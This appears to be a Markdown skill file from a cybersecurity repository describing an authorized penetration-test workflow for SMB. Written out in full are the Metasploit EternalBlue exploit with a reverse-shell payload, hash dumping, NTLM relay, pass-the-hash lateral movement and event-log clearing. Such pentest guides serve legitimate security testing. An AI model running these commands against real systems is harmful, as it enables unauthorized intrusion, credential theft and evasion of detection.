mirror of
https://github.com/mukul975/Anthropic-Cybersecurity-Skills.git
synced 2026-07-17 05:05:16 +03:00
242 lines
10 KiB
Markdown
242 lines
10 KiB
Markdown
---
|
|
name: exploiting-smb-vulnerabilities-with-metasploit
|
|
description: >
|
|
Identifies and exploits SMB protocol vulnerabilities using Metasploit Framework
|
|
during authorized penetration tests to demonstrate risks from unpatched Windows
|
|
systems, misconfigured shares, and weak authentication in enterprise networks.
|
|
domain: cybersecurity
|
|
subdomain: network-security
|
|
tags: [network-security, smb, metasploit, exploitation, eternalblue]
|
|
version: "1.0"
|
|
author: mahipal
|
|
license: Apache-2.0
|
|
---
|
|
# Exploiting SMB Vulnerabilities with Metasploit
|
|
|
|
## When to Use
|
|
|
|
- Testing Windows systems for critical SMB vulnerabilities (EternalBlue, EternalRomance, PrintNightmare) during authorized penetration tests
|
|
- Demonstrating lateral movement risks via SMB relay, pass-the-hash, and credential spraying
|
|
- Validating that patch management processes have addressed known SMB vulnerabilities
|
|
- Assessing SMB signing enforcement and share permission configurations across the domain
|
|
- Testing network segmentation by attempting SMB exploitation across VLAN boundaries
|
|
|
|
**Do not use** against systems without explicit written authorization, against production domain controllers without a maintenance window, or to deploy persistent backdoors beyond the scope of the assessment.
|
|
|
|
## Prerequisites
|
|
|
|
- Metasploit Framework 6.x installed (`msfconsole --version`)
|
|
- Authorized penetration test scope document listing target IP ranges and approved attack types
|
|
- Network access to target SMB services (TCP 445, TCP 139)
|
|
- CrackMapExec and Impacket tools installed for complementary SMB testing
|
|
- Valid test credentials or credential wordlists approved for the engagement
|
|
- Kali Linux or equivalent testing platform
|
|
|
|
## Workflow
|
|
|
|
### Step 1: Enumerate SMB Services and Versions
|
|
|
|
```bash
|
|
# Discover hosts with SMB open using Nmap
|
|
nmap -sS -p 445,139 --open -oA smb_hosts 10.10.0.0/24
|
|
|
|
# Enumerate SMB versions and OS information
|
|
nmap -sV -p 445 --script smb-os-discovery,smb-protocols -oA smb_enum 10.10.0.0/24
|
|
|
|
# Use CrackMapExec for rapid SMB enumeration
|
|
crackmapexec smb 10.10.0.0/24 --gen-relay-list smb_nosigning.txt
|
|
|
|
# Check SMB signing status (disabled = vulnerable to relay)
|
|
crackmapexec smb 10.10.0.0/24 --smb-signing
|
|
|
|
# Enumerate shares with null session
|
|
crackmapexec smb 10.10.0.0/24 -u '' -p '' --shares
|
|
```
|
|
|
|
### Step 2: Scan for Known SMB Vulnerabilities
|
|
|
|
```bash
|
|
# Start Metasploit and scan for MS17-010 (EternalBlue)
|
|
msfconsole -q
|
|
msf6> use auxiliary/scanner/smb/smb_ms17_010
|
|
msf6 auxiliary(smb_ms17_010)> set RHOSTS file:smb_hosts.txt
|
|
msf6 auxiliary(smb_ms17_010)> set THREADS 10
|
|
msf6 auxiliary(smb_ms17_010)> run
|
|
|
|
# Scan for MS08-067 (Conficker vulnerability)
|
|
msf6> use auxiliary/scanner/smb/ms08_067_check
|
|
msf6 auxiliary(ms08_067_check)> set RHOSTS file:smb_hosts.txt
|
|
msf6 auxiliary(ms08_067_check)> run
|
|
|
|
# Check for SMBGhost (CVE-2020-0796)
|
|
nmap -p 445 --script smb-vuln-cve-2020-0796 10.10.0.0/24
|
|
|
|
# Check for PrintNightmare (CVE-2021-34527)
|
|
crackmapexec smb 10.10.0.0/24 -u testuser -p 'TestPass123' -M printnightmare
|
|
```
|
|
|
|
### Step 3: Exploit EternalBlue (MS17-010)
|
|
|
|
```bash
|
|
msf6> use exploit/windows/smb/ms17_010_eternalblue
|
|
msf6 exploit(ms17_010_eternalblue)> set RHOSTS 10.10.5.23
|
|
msf6 exploit(ms17_010_eternalblue)> set LHOST 10.10.1.99
|
|
msf6 exploit(ms17_010_eternalblue)> set LPORT 4444
|
|
msf6 exploit(ms17_010_eternalblue)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
msf6 exploit(ms17_010_eternalblue)> set MaxExploitAttempts 3
|
|
msf6 exploit(ms17_010_eternalblue)> exploit
|
|
|
|
# Post-exploitation -- verify access level
|
|
meterpreter> getuid
|
|
# Server username: NT AUTHORITY\SYSTEM
|
|
|
|
meterpreter> sysinfo
|
|
meterpreter> ipconfig
|
|
meterpreter> hashdump
|
|
```
|
|
|
|
### Step 4: Perform SMB Relay Attack
|
|
|
|
```bash
|
|
# Identify hosts without SMB signing (from Step 1)
|
|
# Set up NTLM relay with Impacket
|
|
sudo impacket-ntlmrelayx -tf smb_nosigning.txt -smb2support -i
|
|
|
|
# Trigger authentication from a compromised host or via phishing
|
|
# From Meterpreter session on a compromised host:
|
|
meterpreter> shell
|
|
C:\> net use \\10.10.1.99\share /user:DOMAIN\admin password
|
|
|
|
# Or use Metasploit's SMB relay module
|
|
msf6> use exploit/windows/smb/smb_relay
|
|
msf6 exploit(smb_relay)> set SMBHOST 10.10.5.30
|
|
msf6 exploit(smb_relay)> set LHOST 10.10.1.99
|
|
msf6 exploit(smb_relay)> exploit
|
|
|
|
# Use responder to capture NTLM hashes for offline cracking
|
|
sudo responder -I eth0 -wrfv
|
|
```
|
|
|
|
### Step 5: Pass-the-Hash and Lateral Movement via SMB
|
|
|
|
```bash
|
|
# Extract hashes from compromised system
|
|
meterpreter> hashdump
|
|
# Administrator:500:aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42:::
|
|
|
|
# Use pass-the-hash with CrackMapExec
|
|
crackmapexec smb 10.10.0.0/24 -u Administrator \
|
|
-H e19ccf75ee54e06b06a5907af13cef42 --shares
|
|
|
|
# Execute commands via pass-the-hash
|
|
crackmapexec smb 10.10.5.30 -u Administrator \
|
|
-H e19ccf75ee54e06b06a5907af13cef42 -x "whoami && hostname"
|
|
|
|
# Use Impacket psexec for interactive shell
|
|
impacket-psexec Administrator@10.10.5.30 \
|
|
-hashes aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
|
|
|
|
# Use Metasploit psexec module
|
|
msf6> use exploit/windows/smb/psexec
|
|
msf6 exploit(psexec)> set RHOSTS 10.10.5.30
|
|
msf6 exploit(psexec)> set SMBUser Administrator
|
|
msf6 exploit(psexec)> set SMBPass aad3b435b51404eeaad3b435b51404ee:e19ccf75ee54e06b06a5907af13cef42
|
|
msf6 exploit(psexec)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
|
|
msf6 exploit(psexec)> set LHOST 10.10.1.99
|
|
msf6 exploit(psexec)> exploit
|
|
```
|
|
|
|
### Step 6: Document Findings and Clean Up
|
|
|
|
```bash
|
|
# Document all compromised systems and access levels
|
|
# In Meterpreter, screenshot desktops for evidence
|
|
meterpreter> screenshot
|
|
|
|
# List accessible shares and sensitive data
|
|
meterpreter> shell
|
|
C:\> net share
|
|
C:\> dir \\10.10.5.30\C$\Users\ /s /b
|
|
|
|
# Clean up -- remove any artifacts
|
|
meterpreter> clearev
|
|
meterpreter> shell
|
|
C:\> del /f C:\Windows\Temp\payload.exe
|
|
|
|
# Close all sessions
|
|
msf6> sessions -K
|
|
|
|
# Verify cleanup
|
|
crackmapexec smb 10.10.5.23 -u Administrator -H <hash> -x "dir C:\Windows\Temp\payload*"
|
|
```
|
|
|
|
## Key Concepts
|
|
|
|
| Term | Definition |
|
|
|------|------------|
|
|
| **EternalBlue (MS17-010)** | Critical SMB vulnerability in SMBv1 allowing remote code execution as SYSTEM without authentication, originally developed by the NSA and leaked by Shadow Brokers |
|
|
| **SMB Signing** | Cryptographic signing of SMB packets to prevent tampering and relay attacks; when disabled, attackers can relay NTLM authentication to other SMB hosts |
|
|
| **Pass-the-Hash** | Authentication technique using captured NTLM password hashes directly instead of plaintext passwords, bypassing the need to crack the hash |
|
|
| **NTLM Relay** | Attack where captured NTLM authentication is forwarded to a different server in real-time, granting the attacker access as the relayed user |
|
|
| **PsExec** | Remote execution technique that uploads a service binary to the ADMIN$ share and creates a Windows service to execute commands as SYSTEM |
|
|
| **Null Session** | Anonymous SMB connection (empty username and password) that may expose share listings, user enumeration, and policy information on misconfigured systems |
|
|
|
|
## Tools & Systems
|
|
|
|
- **Metasploit Framework**: Exploitation framework with dedicated SMB scanner, exploit, and post-exploitation modules for comprehensive SMB testing
|
|
- **CrackMapExec**: Swiss-army knife for SMB enumeration, credential testing, share enumeration, and command execution across Windows networks
|
|
- **Impacket**: Python library providing psexec, smbclient, ntlmrelayx, and other tools for low-level SMB protocol interaction
|
|
- **Responder**: LLMNR/NBT-NS/mDNS poisoner that captures NTLM hashes from Windows name resolution fallback behavior
|
|
- **enum4linux-ng**: Updated SMB enumeration tool for extracting users, groups, shares, and policies from Windows/Samba hosts
|
|
|
|
## Common Scenarios
|
|
|
|
### Scenario: Internal Penetration Test Targeting Windows Domain via SMB
|
|
|
|
**Context**: During an internal penetration test for a financial services firm, the tester has network access to the corporate VLAN (10.10.0.0/16). The scope includes testing all Windows servers and workstations for SMB-related vulnerabilities. Active Directory domain is CORP.EXAMPLE.COM with approximately 200 hosts.
|
|
|
|
**Approach**:
|
|
1. Scan the entire /16 for open SMB ports and enumerate OS versions with CrackMapExec
|
|
2. Identify 12 hosts running Windows Server 2012 R2 without MS17-010 patch applied
|
|
3. Exploit EternalBlue on a non-critical file server (10.10.5.23) to gain SYSTEM access
|
|
4. Extract local administrator password hash using hashdump and discover password reuse across 47 hosts
|
|
5. Use pass-the-hash to access a domain controller, extracting the NTDS.dit database
|
|
6. Demonstrate that SMB signing is disabled on 83% of hosts, enabling relay attacks
|
|
7. Document the complete attack chain showing how one unpatched system led to full domain compromise
|
|
|
|
**Pitfalls**:
|
|
- EternalBlue exploit can cause a blue screen of death (BSOD) on the target, especially on older or unstable systems
|
|
- Running psexec on heavily monitored endpoints may trigger EDR alerts and burn the engagement
|
|
- Performing hashdump on domain controllers with large databases can cause performance degradation
|
|
- Not checking for SMBv1 explicitly -- some scanners may miss it if SMBv2/v3 is also available
|
|
|
|
## Output Format
|
|
|
|
```
|
|
## SMB Vulnerability Assessment Report
|
|
|
|
**Engagement**: Internal Penetration Test
|
|
**Target Range**: 10.10.0.0/16 (CORP.EXAMPLE.COM)
|
|
**SMB Hosts Discovered**: 187
|
|
|
|
### Critical Findings
|
|
|
|
**Finding 1: MS17-010 (EternalBlue) - 12 Unpatched Hosts**
|
|
- Severity: Critical (CVSS 9.8)
|
|
- Affected: 10.10.5.23, 10.10.5.24, 10.10.8.10 (+ 9 others)
|
|
- Impact: Remote code execution as SYSTEM without authentication
|
|
- Exploited: Yes - gained SYSTEM on 10.10.5.23
|
|
- Remediation: Apply MS17-010 patch, disable SMBv1
|
|
|
|
**Finding 2: SMB Signing Disabled - 155/187 Hosts**
|
|
- Severity: High (CVSS 7.5)
|
|
- Impact: NTLM relay attacks allow credential forwarding
|
|
- Exploited: Yes - relayed domain admin credentials
|
|
- Remediation: Enable SMB signing via Group Policy
|
|
|
|
**Finding 3: Local Admin Password Reuse - 47 Hosts**
|
|
- Severity: High (CVSS 7.2)
|
|
- Impact: Compromise of one host enables lateral movement to 47 systems
|
|
- Remediation: Deploy LAPS (Local Administrator Password Solution)
|
|
```
|